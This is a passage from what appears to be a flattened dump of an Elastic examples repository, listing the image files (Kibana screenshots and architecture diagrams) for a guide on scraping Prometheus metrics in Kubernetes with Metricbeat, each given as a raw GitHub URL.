https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/005-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/006-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/006-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/007-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/007-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/008-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/008-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/009-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/009-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/010-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/010-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/011-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/011-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/012-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/012-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/013-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/013-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/014-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/014-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/015-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/015-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/016-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/016-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/017-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/017-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/018-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/018-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/019-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/019-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/020-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/020-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/annotations.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/annotations.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/kube-state-metrics.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/kube-state-metrics.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/metricbeat-autodiscover-exporters.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/metricbeat-autodiscover-exporters.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/metricbeat-prometheus-server.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/metricbeat-prometheus-server.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/prometheus-autodiscover-snippet.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/prometheus-autodiscover-snippet.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/prometheus-federate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/prometheus-federate.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/prometheus-selfmon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/prometheus-selfmon.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/sidecar.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/sidecar.png


--------------------------------------------------------------------------------